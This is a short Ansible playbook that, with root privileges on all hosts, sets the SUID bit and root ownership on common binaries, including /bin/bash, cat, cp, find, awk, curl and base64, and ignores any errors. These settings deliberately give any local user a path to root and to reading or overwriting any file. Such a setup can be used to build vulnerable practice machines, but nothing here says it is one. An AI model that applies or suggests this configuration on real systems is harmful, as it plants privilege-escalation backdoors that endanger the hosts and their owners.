- hosts: all
  become: true
  tasks:
    - name: Set SUID for specified binaries
      file:
        path: "{{ item }}"
        owner: root
        group: root
        mode: '04755'
      ignore_errors: yes
      loop:
        - /usr/bin/awk
        - /usr/bin/cat
        - /usr/bin/curl
        - /usr/bin/base64
        - /bin/bash
        - /usr/bin/cp
        - /usr/bin/curl
        - /usr/bin/dig
        - /usr/bin/find
        - /usr/bin/file